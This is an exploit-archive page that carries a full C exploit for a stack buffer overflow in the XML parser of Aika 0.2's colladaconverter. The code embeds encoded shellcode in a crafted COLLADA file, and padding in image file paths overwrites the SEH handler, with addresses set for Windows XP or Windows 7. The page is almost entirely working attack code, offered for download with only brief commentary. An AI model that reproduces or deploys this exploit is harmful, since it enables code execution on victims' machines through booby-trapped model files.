exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Aika 0.2 Buffer Overflow

Aika 0.2 Buffer Overflow
Posted Sep 12, 2011
Authored by isciurus

Aika version 0.2 colladaconverter XML parsing buffer overflow exploit.

tags | exploit, overflow
SHA-256 | a7a17f1f548e492db73c5689f2ece765a34e3dcc5f59cd06d8259bf3bf35ba9e

Aika 0.2 Buffer Overflow

Change Mirror Download
/*
//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
# Exploit Title: Aika colladaconverter buffer overflow exploit
# Date: 09/11/2011
# Author: isciurus
# Software Link: http://aika.googlecode.com/files/aika-v02.zip
# Version: 0.2
# Tested on: Windows 7 x64

This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.

This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.

You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/gpl-3.0.html>.

//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
*/

#include <stdio.h>
#include <windows.h>
#include <stdlib.h>
#include "string.h"

char printableASCIIShellcode[] = // encoded 499 bytes
"WUQQUj3hKzJYSaRYjVCX4VGRH4z0BfXRQPPZjQX4QP2BM0BMX2Ai0BMXYZPOCKHG" // will be injected inside the file path ---------
"OHOCHGCKHKkAgFCBMGKJEA3Ag2Bg0BgABE94ku2QmAiAszHthbzMIMQ8Uz9TFQWC" // |
"GDNW6jYeJ8l47kSCPlKPRZljwLskRH6RQ0OiKjRENz4TUYHTfu6rjMTi1NAjGwMF" // |
"RHxIjxgzoZnVXlGIXJbCJYhxKHXKvjyFXDDLbNydxzXT3vTJdfa7Hpp3VM1jUOVv" // |
"UJYuPT3vkOQIPYGxa6Rk6NOaV9PEH56Mrrz5ZSPLOAvKIsFOCbfqWBRXPCNWSmJf" // |
"EVCXNoYNR9oDOaWoykz1Ev3TxcSHQz4ZOOLxlGBjsDGWGJs1EOCNqaAAOWHAMWCx" // |
"JEFIrTQ70vEFELaCIPPAPP0GUSmGfq1ZioUNQQATGCISZuJHNKRnlC3baNSAvIRO" // |
"HLvt4zVFHLkLxBQR5XsKpEN90RgdBZlNmISLELGsEL0myBVKzJY"; // |
// |
char xml[] = // |
"<?xml version=\"1.0\" encoding=\"utf8\"?>" // |
"<COLLADA xmlns=\"http://www.collada.org/2005/11/COLLADASchema\" version=\"1.4.1\">" // |
"<asset>" // |
" <contributor>" // |
" <author>isciurus</author>" // |
" <comments>The shellcode encoded with http://www.exploit-db.com/exploits/13286/</comments>" // |
" </contributor>" // |
" <created>2011-09-04T22:29:59Z</created>" // |
" <modified>2011-09-04T22:29:59Z</modified>" // |
" <unit meter=\"0.01\" name=\"centimeter\"/>" // |
" <up_axis>Y_UP</up_axis>" // |
"</asset>" // |
"<library_cameras>" // |
" <camera id=\"cameraShape1\" name=\"cameraShape1\">" // |
" <optics>" // |
" <technique_common>" // |
" <perspective>" // |
" <yfov>37.8492</yfov>" // |
" <aspect_ratio>1.5</aspect_ratio>" // |
" <znear>1</znear>" // |
" <zfar>10000</zfar>" // |
" </perspective>" // |
" </technique_common>" // |
" </optics>" // |
" </camera>" // |
"</library_cameras>" // |
"<library_lights></library_lights>" // |
"<library_images>" // |
" <image id=\"file2\" name=\"file2\" depth=\"1\">" // |
" <init_from>E:\\aika\\" // <---------------------------
"SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS"
"SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS"
"SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS"
"SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS"
"SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS"
"SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS"
"SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS"
"SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS"
"SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS"
"SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS"
"SSSSSSSSSSSSSSADDR_1AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
// ^
// |
// ------------------------------------------------- the shellcode will be copied at this address
"AAAAA"
" </init_from>"
" </image>"
" <image id=\"file3\" name=\"file3\" depth=\"1\">"
" <init_from>E:\\aika\\"
"BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB"
"BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB"
"BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB"
"BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB"
"BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB"
"BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB"
"BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB"
"BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB"
"BBBBBBBBADDR_2AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
// ^
// |
// -------------------------------------------------------- these bytes will overwrite SEH handler
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" // this part forces the application to write outside
"AAAAAAAAAAAAAAAAAAAA" // the stack and triggers AV exception
" </init_from>"
" </image>"
"</library_images>"
"<library_materials>"
" <material id=\"blinn3\" name=\"blinn3\">"
" <instance_effect url=\"#blinn3-fx\"/>"
" </material>"
"</library_materials>"
"<library_geometries>"
" <geometry id=\"LOD3spShape-lib\" name=\"LOD3spShape\">"
" <mesh>"
" <source id=\"LOD3spShape-lib-positions\" name=\"position\">"
" <technique_common>"
" <accessor count=\"2108\" offset=\"0\" source=\"#LOD3spShape-lib-positions-array\" stride=\"3\">"
" <param name=\"X\" type=\"float\"/>"
" <param name=\"Y\" type=\"float\"/>"
" <param name=\"Z\" type=\"float\"/>"
" </accessor>"
" </technique_common>"
" </source>"
" <source id=\"LOD3spShape-lib-normals\" name=\"normal\">"
" <technique_common>"
" <accessor count=\"2290\" offset=\"0\" source=\"#LOD3spShape-lib-normals-array\" stride=\"3\">"
" <param name=\"X\" type=\"float\"/>"
" <param name=\"Y\" type=\"float\"/>"
" <param name=\"Z\" type=\"float\"/>"
" </accessor>"
" </technique_common>"
" </source>"
" <source id=\"LOD3spShape-lib-map1\" name=\"map1\">"
" <technique_common>"
" <accessor count=\"2277\" offset=\"0\" source=\"#LOD3spShape-lib-map1-array\" stride=\"2\">"
" <param name=\"S\" type=\"float\"/>"
" <param name=\"T\" type=\"float\"/>"
" </accessor>"
" </technique_common>"
" </source>"
" <vertices id=\"LOD3spShape-lib-vertices\">"
" <input semantic=\"POSITION\" source=\"#LOD3spShape-lib-positions\"/>"
" </vertices>"
" <triangles count=\"4212\" material=\"blinn3SG\">"
" <input offset=\"0\" semantic=\"VERTEX\" source=\"#LOD3spShape-lib-vertices\"/>"
" <input offset=\"1\" semantic=\"NORMAL\" source=\"#LOD3spShape-lib-normals\"/>"
" <input offset=\"2\" semantic=\"TEXCOORD\" source=\"#LOD3spShape-lib-map1\" set=\"0\"/>"
" <p>375</p>"
" </triangles>"
" </mesh>"
" </geometry>"
"</library_geometries>"
"<scene>"
" <instance_visual_scene url=\"#VisualSceneNode\"/>"
"</scene>"
"</COLLADA>";

int main(int argc, char **argv)
{
FILE *xml_file;
char win7;
char *offset;
char *ll;

if(argc < 2)
{
printf("\nUsage: aika_bof <malformed_collada_xml_path>");
return 0;
}

if(sizeof(printableASCIIShellcode) > 644)
{
printf("\nSorry, the shellcode is too long, 644 chars is maximum");
return 0;
}

while(1)
{
char os;

printf("\nChoose OS version ([X] for Windows XP, [7] for Windows 7):");
os = tolower(getchar());

if(os == 'x')
{
win7 = 0;
break;
}
else if(os == '7')
{
win7 = 1;
break;
}
else
{
printf("\nUnknown OS version");
}
}

printf("\n[*] Injecting the shellcode into the xml...");

offset = strstr(xml, "SSSSSSSSSSSSSSSSSSSSSSSSSSSS");
strncpy(offset, printableASCIIShellcode, sizeof(printableASCIIShellcode) - 1);

if(win7 == 1)
{
offset = strstr(xml, "ADDR_1");
strncpy(offset, "%40%02", sizeof("%40%02") -1);
offset = strstr(xml, "ADDR_2");
strncpy(offset, "%40%02", sizeof("%40%02") -1);
}
else
{
offset = strstr(xml, "ADDR_1");
strncpy(offset, "%40%01", sizeof("%40%01") -1);
offset = strstr(xml, "ADDR_2");
strncpy(offset, "%40%01", sizeof("%40%01") -1);
}

printf("done");

printf("\n[*] Writing %d bytes to %s...", sizeof(xml), argv[1]);

xml_file = fopen(argv[1], "wb");
if(xml_file == NULL)
{
printf("\nerror while opening %s", argv[1]);
return 0;
}

if(fwrite(xml, 1, sizeof(xml) - 1, xml_file) != sizeof(xml) - 1)
{
printf("\nerror while writing into %s", argv[1]);
return 0;
}

printf("done");
}

Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    0 Files
  • 5
    Mar 5th
    0 Files
  • 6
    Mar 6th
    0 Files
  • 7
    Mar 7th
    0 Files
  • 8
    Mar 8th
    0 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    0 Files
  • 12
    Mar 12th
    0 Files
  • 13
    Mar 13th
    0 Files
  • 14
    Mar 14th
    0 Files
  • 15
    Mar 15th
    0 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    0 Files
  • 19
    Mar 19th
    0 Files
  • 20
    Mar 20th
    0 Files
  • 21
    Mar 21st
    0 Files
  • 22
    Mar 22nd
    0 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    0 Files
  • 26
    Mar 26th
    0 Files
  • 27
    Mar 27th
    0 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close